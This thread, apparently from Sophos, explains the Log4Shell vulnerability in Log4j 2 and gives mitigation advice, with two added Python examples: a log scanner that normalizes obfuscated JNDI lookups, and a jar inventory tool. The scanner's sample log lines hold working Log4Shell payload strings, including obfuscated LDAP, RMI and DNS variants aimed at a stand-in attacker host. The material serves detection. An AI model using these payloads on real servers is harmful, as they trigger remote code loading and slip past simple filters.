#Log4Shell Hell: anatomy of an exploit outbreak

A vulnerability in a widely-used Java logging component is exposing untold numbers of organizations to potential remote code attacks and information exposure... 1/16
On December 9, a severe remote code execution vulnerability (CVE-2021-44228) was revealed in Apache Log4j 2, a very common logging library used by developers of web and server applications written in Java and other JVM languages. 2/16
The vulnerability affects a broad range of services and applications on servers, making it extremely dangerous—and the latest updates for those server applications urgent. 3/16
The vulnerability makes it possible for any attacker who can get text into a logged message or a log message parameter to make the server load code from a remote host: the logged string carries a lookup of the form ${jndi:ldap://host/path}, and the targeted server resolves it through the Java Naming and Directory Interface (JNDI), fetching and executing whatever the remote host returns. 4/16
JNDI interfaces with a number of network services, including the Lightweight Directory Access Protocol (LDAP), the Domain Name System (DNS), Java Remote Method Invocation (RMI), and the Common Object Request Broker Architecture (CORBA). 5/16
@Sophos has seen efforts to exploit LDAP, DNS and RMI, using a URL for one of those services that redirects to an external server.

Sophos is already detecting malicious cryptominer operations attempting to leverage the vulnerability, and... 6/16
...there are credible reports from other sources that several automated botnets (such as Mirai, Tsunami, and Kinsing) have begun to exploit it as well. Other types of attacks – and payloads – are likely to rapidly follow. 7/16
While there are steps server operators can take to mitigate the vulnerability, the best fix is to upgrade to the patched version (Log4j 2.15.0 at the time of this thread; 2.16.0 and later releases closed gaps found in that first fix, so take the current 2.x release). But rolling out an upgrade may not be that simple, especially if organizations don’t know where it has been deployed as a component. 8/16
Similar critical JNDI injection vulnerabilities have been found in other Java server components in the past, including one in the Internet Inter-ORB Protocol (IIOP) implementation of Oracle’s WebLogic Server (CVE-2020-2551). 9/16
The widespread use of Log4J in commercial and open-source software connected to the Internet—web and mobile application servers, email servers (including Apache’s Java-based James email server), and cloud services—makes this a difficult vulnerability to track down and patch. 10/16
Sophos has already detected hundreds of thousands of attempts since December 9 to remotely execute code using this vulnerability, and log searches by other organizations (including Cloudflare) suggest the vulnerability may have been openly exploited for weeks. 11/16
The instances detected by Sophos have been mostly scans for the vulnerability, exploit tests, and attempts to install coin miners.

We have also seen attempts to extract information from services, including Amazon Web Services keys and other private data. 12/16
👉 Detection and correction

Resolving the Log4J vulnerability requires defense in depth. Organizations should deploy rules to block exploit traffic from all internet-facing services (Sophos IPS currently blocks traffic matching known Log4J exploit signatures). 13/16
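The following is an added example, not code from the Sophos report or from Log4j itself. It serves two passages above: the mechanism paragraph (how a logged string becomes a JNDI lookup) and the detection paragraph (blocking exploit traffic by signature). It emulates how Log4j 2 (before 2.15) flattens nested `${...}` lookups innermost-first, which is why the obfuscated variants seen in the wild (`${${lower:j}ndi:...}`, `${${::-j}${::-n}...}`, percent-encoded payloads in request paths) still end up as a `jndi:` lookup, and then runs that normalization over a handful of constructed access-log lines to flag the ones that would have triggered an LDAP, RMI or DNS lookup. The hostnames and log lines are made up, and only the lookups relevant to obfuscation are modelled.

```python
"""Emulate Log4j 2's nested ${...} lookup resolution (pre-2.15 behaviour) and use it to
spot JNDI lookups hidden in log lines.  Only the lookups that matter for obfuscation are
modelled (lower:, upper:, the ':-' default syntax and jndi: itself); environment-dependent
lookups such as env:/sys:/date: are left unresolved or replaced by their ':-' default,
which is the safe choice for offline detection."""
from urllib.parse import unquote


def _lookup(expr: str, hits: list) -> str:
    """Resolve one already-flattened lookup expression the way Log4j's Interpolator would."""
    name, has_default, default = expr.partition(":-")      # ${key:-default}
    prefix, _, key = name.partition(":")                   # ${prefix:key}
    prefix = prefix.lower()                                # Log4j matches prefixes case-insensitively
    if prefix == "jndi":
        scheme = key.partition(":")[0].lower()             # ldap, ldaps, rmi, dns, iiop ...
        hits.append((scheme, key))
        return "${jndi:" + key + "}"                       # keep the canonical form visible
    if prefix == "lower":
        return key.lower()
    if prefix == "upper":
        return key.upper()
    # Unknown prefix (env:, sys:, a typo, or the empty name in ${::-j}): Log4j falls back to
    # the default value if one was given, otherwise leaves the text untouched.
    return default if has_default else "${" + expr + "}"


def normalize(text: str, hits: list) -> str:
    """Resolve ${...} innermost-first, as StrSubstitutor does, recording every JNDI hit."""
    out, i = [], 0
    while i < len(text):
        start = text.find("${", i)
        if start < 0:
            out.append(text[i:])
            break
        out.append(text[i:start])
        depth, j = 0, start
        while j < len(text):                               # find the matching closing brace
            if text.startswith("${", j):
                depth, j = depth + 1, j + 2
            elif text[j] == "}":
                depth, j = depth - 1, j + 1
                if depth == 0:
                    break
            else:
                j += 1
        else:                                              # unterminated ${ : emit verbatim
            out.append(text[start:])
            break
        inner = normalize(text[start + 2:j - 1], hits)     # nested lookups resolve first
        out.append(_lookup(inner, hits))
        i = j
    return "".join(out)


def scan_logs(lines):
    """Percent-decode each line (payloads often arrive URL-encoded in request paths),
    normalize it, and report every JNDI lookup that would have fired."""
    findings = []
    for lineno, raw in enumerate(lines, 1):
        hits = []
        normalize(unquote(raw), hits)
        for scheme, target in hits:
            findings.append({"line": lineno, "scheme": scheme, "target": target})
    return findings


# Constructed access-log lines (hostnames and addresses are made up).
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Dec/2021:08:12:01 +0000] "GET / HTTP/1.1" 200 612 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:08:12:07 +0000] "GET / HTTP/1.1" 200 612 "-" '
    '"${jndi:ldap://attacker.example:1389/a}"',
    '10.0.0.9 - - [10/Dec/2021:08:12:09 +0000] '
    '"GET /${${lower:j}ndi:${lower:l}dap://attacker.example/x} HTTP/1.1" 404 153 "-" "curl/7.79"',
    '10.0.0.9 - - [10/Dec/2021:08:12:11 +0000] "GET / HTTP/1.1" 200 612 "-" '
    '"${${::-j}${::-n}${::-d}${::-i}:${::-r}mi://attacker.example:1099/obj}"',
    '10.0.0.9 - - [10/Dec/2021:08:12:13 +0000] '
    '"GET /?q=%24%7Bjndi%3Adns%3A%2F%2F${env:NaN:-}c.attacker.example%2Fa%7D HTTP/1.1" 200 40 "-" "-"',
    '10.0.0.7 - - [10/Dec/2021:08:12:20 +0000] "GET /status HTTP/1.1" 200 12 "-" "${sys:java.version}"',
]

if __name__ == "__main__":
    for f in scan_logs(SAMPLE_LOG):
        print(f"line {f['line']}: {f['scheme'].upper()} lookup -> {f['target']}")
```

A plain `${jndi:` signature catches only the second sample line; the normalization step is what makes lines 3 to 5 visible, and it costs nothing to run over request paths, headers and form fields before they are logged, which is exactly where an inline rule or a log search should apply it.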
Long-term protection will require identifying and updating instances of Log4J, or mitigating the issue by changing Log4J’s settings... 14/16
...for releases 2.10 through 2.14.1 that means setting the log4j2.formatMsgNoLookups system property (or the LOG4J_FORMAT_MSG_NO_LOOKUPS environment variable) to true, or using %m{nolookups} in the pattern layouts of the XML or YAML configuration file; because that property was later found to be an incomplete fix (CVE-2021-45046), the more robust option for any 2.x release is to remove the JndiLookup class from the log4j-core jar. Where the settings are applied programmatically, that may require code changes in products where Log4J is embedded. 15/16
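As an added example (not part of the thread and not Sophos tooling), the inventory script below does the "find where it has been deployed" step that the mitigation advice above depends on: it walks a directory tree, opens every jar, WAR, EAR and zip, recurses into archives nested inside archives, reads the version from the Maven pom.properties that log4j-core ships with, and checks whether the JndiLookup class is still present. The sample jars it scans are constructed stand-ins built in a temporary directory (a few bytes per class entry, not the real library); the version thresholds are those of the Apache advisories.

```python
"""Find Log4j 2 copies on disk, including jars nested inside WARs/EARs, read the version
from the Maven pom.properties that log4j-core ships, and check whether the JndiLookup
class (the one the 'remove JndiLookup.class' mitigation deletes) is still present."""
import io
import pathlib
import re
import tempfile
import zipfile

ARCHIVE_EXT = (".jar", ".war", ".ear", ".zip")
POM = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
CORE_PKG = "org/apache/logging/log4j/core/"


def parse_version(version):
    """'2.14.1' -> (2, 14, 1); '2.0-beta9' -> (2, 0, 0); None or garbage -> None."""
    m = re.match(r"(\d+)\.(\d+)(?:\.(\d+))?", version or "")
    return (int(m.group(1)), int(m.group(2)), int(m.group(3) or 0)) if m else None


def assess(version, jndi_lookup_present):
    """Verdict for one log4j-core copy against CVE-2021-44228 and its follow-up CVE-2021-45046."""
    v = parse_version(version)
    if v is None:
        return "unknown version: inspect manually"
    if v < (2, 0, 0):
        return "log4j 1.x: not affected by CVE-2021-44228 (but end-of-life)"
    if v < (2, 16, 0) and not jndi_lookup_present:
        return "mitigated: JndiLookup.class removed"
    if v < (2, 15, 0):
        return "VULNERABLE: CVE-2021-44228"
    if v < (2, 16, 0):
        return "partial fix only: CVE-2021-45046, upgrade"
    return "fixed for CVE-2021-44228 (later releases fix further issues; use the current 2.x)"


def _inspect_zip(zf, label, findings):
    names = set(zf.namelist())
    if POM in names or any(n.startswith(CORE_PKG) for n in names):   # shaded jars lack the pom
        version = None
        if POM in names:
            for line in zf.read(POM).decode("utf-8", "replace").splitlines():
                key, sep, val = line.partition("=")
                if sep and key.strip() == "version":
                    version = val.strip()
        present = JNDI_CLASS in names
        v = parse_version(version)
        findings.append({
            "path": label, "version": version, "jndi_lookup_present": present,
            # log4j2.formatMsgNoLookups exists from 2.10; message lookups were removed in 2.16
            "supports_formatMsgNoLookups": bool(v and (2, 10, 0) <= v < (2, 16, 0)),
            "verdict": assess(version, present),
        })
    for name in sorted(names):                                        # recurse into nested archives
        if name.lower().endswith(ARCHIVE_EXT):
            try:
                with zipfile.ZipFile(io.BytesIO(zf.read(name))) as inner:
                    _inspect_zip(inner, f"{label}!{name}", findings)
            except zipfile.BadZipFile:
                continue


def inventory(root):
    """Walk root and return one finding per log4j-core copy found, nested ones included."""
    root = pathlib.Path(root)
    findings = []
    for path in sorted(root.rglob("*")):
        if path.is_file() and path.suffix.lower() in ARCHIVE_EXT:
            try:
                with zipfile.ZipFile(path) as zf:
                    _inspect_zip(zf, path.relative_to(root).as_posix(), findings)
            except zipfile.BadZipFile:
                continue
    return findings


def _write_jar(target, version, keep_jndi_class=True):
    """Write a minimal constructed stand-in for log4j-core-<version>.jar (not the real jar)."""
    with zipfile.ZipFile(target, "w") as z:
        z.writestr(POM, f"groupId=org.apache.logging.log4j\nartifactId=log4j-core\nversion={version}\n")
        z.writestr(CORE_PKG + "Logger.class", b"\xca\xfe\xba\xbe")
        if keep_jndi_class:
            z.writestr(JNDI_CLASS, b"\xca\xfe\xba\xbe")


def build_sample_tree(root):
    """Constructed deployment: two 2.14.1 copies (one with JndiLookup stripped), a 2.15.0 buried
    in a WAR, and a 2.17.1."""
    root = pathlib.Path(root)
    for app in ("app1", "app2", "app3", "app4"):
        (root / app / "lib").mkdir(parents=True, exist_ok=True)
    _write_jar(root / "app1/lib/log4j-core-2.14.1.jar", "2.14.1")
    _write_jar(root / "app2/lib/log4j-core-2.14.1.jar", "2.14.1", keep_jndi_class=False)
    nested = io.BytesIO()
    _write_jar(nested, "2.15.0")
    with zipfile.ZipFile(root / "app3/app3.war", "w") as war:
        war.writestr("WEB-INF/web.xml", "<web-app/>")
        war.writestr("WEB-INF/lib/log4j-core-2.15.0.jar", nested.getvalue())
    _write_jar(root / "app4/lib/log4j-core-2.17.1.jar", "2.17.1")


def demo():
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_tree(tmp)
        return inventory(tmp)


if __name__ == "__main__":
    for f in demo():
        print(f"{f['path']}: version={f['version']} jndi_lookup={f['jndi_lookup_present']} -> {f['verdict']}")
```

Point `inventory()` at application roots, container image layers and build caches rather than only the obvious lib directories; the copies that get missed are the ones embedded in vendor WARs and fat jars, which is why the scanner descends into archives instead of trusting file names.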
SophosLabs would like to acknowledge Fraser Howard, Hardik Shah, @GaborSzappanos, and Mukesh Kumar for their contributions to this report.

See all the details from @thepacketrat: news.sophos.com/en-us/2021/12/… 16/16
